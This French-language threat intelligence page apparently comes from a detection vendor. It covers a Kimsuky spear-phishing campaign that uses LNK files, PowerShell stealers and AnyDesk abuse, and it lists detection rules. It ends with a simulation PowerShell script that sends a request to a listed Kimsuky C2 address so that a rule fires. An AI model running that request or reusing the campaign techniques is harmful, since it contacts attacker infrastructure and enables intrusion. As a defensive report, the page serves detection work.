SOC Prime Bias: Critical

26 Aug 2026 06:32 UTC

Kimsuky utilise des outils RMM légitimes dans des campagnes en Asie du Nord-Est

Author Photo
SOC Prime Team linkedin icon Suivre
Kimsuky utilise des outils RMM légitimes dans des campagnes en Asie du Nord-Est
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de la menace Kimsuky mènent des campagnes de spear-phishing contre des cibles en Corée du Sud et au Japon en utilisant des fichiers LNK hébergés sur OneDrive. Une fois exécuté, le malware établit une persistance grâce à des tâches planifiées et récupère des scripts PowerShell pour voler des informations système, des e-mails et des frappes de touches. Les attaquants abusent également d’outils de contrôle à distance légitimes tels que Chrome Remote Desktop et AnyDesk pour maintenir l’accès tout en se fondant dans l’activité administrative normale.

Enquête

L’enquête a révélé une chaîne d’infection en plusieurs étapes impliquant des fichiers LNK malveillants, des VBScript obscurcis et des scripts PowerShell. Les chercheurs ont analysé des composants spécialisés, y compris une extension Chrome malveillante conçue pour collecter des données Gmail et des scripts utilisés pour installer AnyDesk. Les commentaires en langue coréenne et les chaînes de débogage trouvés dans le code généré par l’IA suggèrent également que les opérateurs peuvent utiliser l’IA générative durant le développement.

Atténuation

Les utilisateurs doivent faire preuve de prudence lorsqu’ils ouvrent des fichiers LNK ou des liens reçus de sources inconnues, d’autant plus que Windows peut masquer les extensions de fichiers. Les organisations doivent régulièrement auditer les logiciels installés pour toute installation non autorisée de Chrome Remote Desktop ou d’AnyDesk. Il est aussi fortement recommandé de surveiller les extensions de navigateur pour des permissions excessives ou inattendues.

Réponse

Si une activité Kimsuky est détectée, les équipes de sécurité doivent examiner les tâches planifiées pour des entrées suspectes lançant wscript.exe or powershell.exe. Des processus et fichiers AnyDesk inattendus situés dans %appdata% les répertoires doivent aussi être examinés. Les extensions de navigateur et les configurations de bureau à distance doivent être vérifiées pour identifier et supprimer les mécanismes d’accès non autorisés.

Flux d’attaque

Nous mettons toujours à jour cette partie.

Détections

Fichier LNK malveillant possible avec double extension (via cmdline)

Équipe SOC Prime
25 août 2026

LOLBAS WScript / CScript (via process_creation)

Équipe SOC Prime
25 août 2026

LOLBAS Schtasks (via cmdline)

Équipe SOC Prime
25 août 2026

Exécution suspecte du profil utilisateur public (via process_creation)

Équipe SOC Prime
25 août 2026

Utilisation suspecte de CURL (via cmdline)

Équipe SOC Prime
25 août 2026

Chaînes Powershell suspectes (via powershell)

Équipe SOC Prime
25 août 2026

Appel de méthodes .NET suspectes depuis Powershell (via powershell)

Équipe SOC Prime
25 août 2026

Fichiers suspects dans le profil utilisateur public (via file_event)

Équipe SOC Prime
25 août 2026

IOCs (HashMd5) pour détecter : l’abus par Kimsuky d’outils de contrôle à distance légitimes en Asie du Nord-Est Partie 2

Règles d’IA SOC Prime
25 août 2026

IOCs (HashMd5) pour détecter : l’abus par Kimsuky d’outils de contrôle à distance légitimes en Asie du Nord-Est Partie 1

Règles d’IA SOC Prime
25 août 2026

IOCs (SourceIP) pour détecter : l’abus par Kimsuky d’outils de contrôle à distance légitimes en Asie du Nord-Est

Règles d’IA SOC Prime
25 août 2026

IOCs (DestinationIP) pour détecter : l’abus par Kimsuky d’outils de contrôle à distance légitimes en Asie du Nord-Est

Règles d’IA SOC Prime
25 août 2026

Détection des indicateurs de communication C&C Kimsuky [Connexion réseau Windows]

Règles d’IA SOC Prime
25 août 2026

Tâche planifiée pour l’exécution de VBScript malveillant [Windows Powershell]

Règles d’IA SOC Prime
25 août 2026

Exécution de simulation

Prérequis : La vérification pré-flights des télémétries et bases de référence doit avoir été réussie.

Raison : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non pertinents conduiront à une mauvaise interprétation.

  • Récit de l’attaque et commandes : L’adversaire a obtenu une prise initiale sur le poste de travail Windows via une pièce jointe de spear-phishing. Pour établir la Commande et le Contrôle (C2) et commencer l’exfiltration des informations système, l’attaquant exécute un one-liner PowerShell. Ce script est conçu pour imiter le comportement connu du groupe Kimsuky : contacter un point de terminaison PHP spécifique sur un serveur compromis pour recevoir de nouvelles instructions. Le but est de se fondre dans le trafic Web standard tout en atteignant le point de terminaison C2 précis identifié par le renseignement sur les menaces.

  • Script de test de régression :

    # Script de simulation C2 Kimsuky
    # Ce script simule une demande à l'une des URL codées en dur dans la règle de détection.
    
    $c2_url = "http://103.77.242.187/view.php?type=apple&seed=simulation_test"
    $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    
    Write-Host "[!] Simulation de communication C2 Kimsuky vers : $c2_url"
    
    try {
        # Utilisation de Invoke-WebRequest pour générer un trafic HTTP au niveau proxy
        $response = Invoke-WebRequest -Uri $c2_url -UserAgent $user_agent -Method Get -ErrorAction Stop
        Write-Host "[+] Demande terminée. Code de statut : $($response.StatusCode)"
    } catch {
        Write-Host "[-] Demande échouée (Attendu si l'IP n'est pas en ligne) : $($_.Exception.Message)"
    }
  • Commandes de nettoyage :

    # Aucun fichier persistant n'a été créé; aucun nettoyage requis.
    # Si un fichier a été téléchargé, utilisez : Remove-Item -Path "C:pathtomalicious_file.exe" -Force
    Write-Host "[*] Nettoyage de la simulation terminé."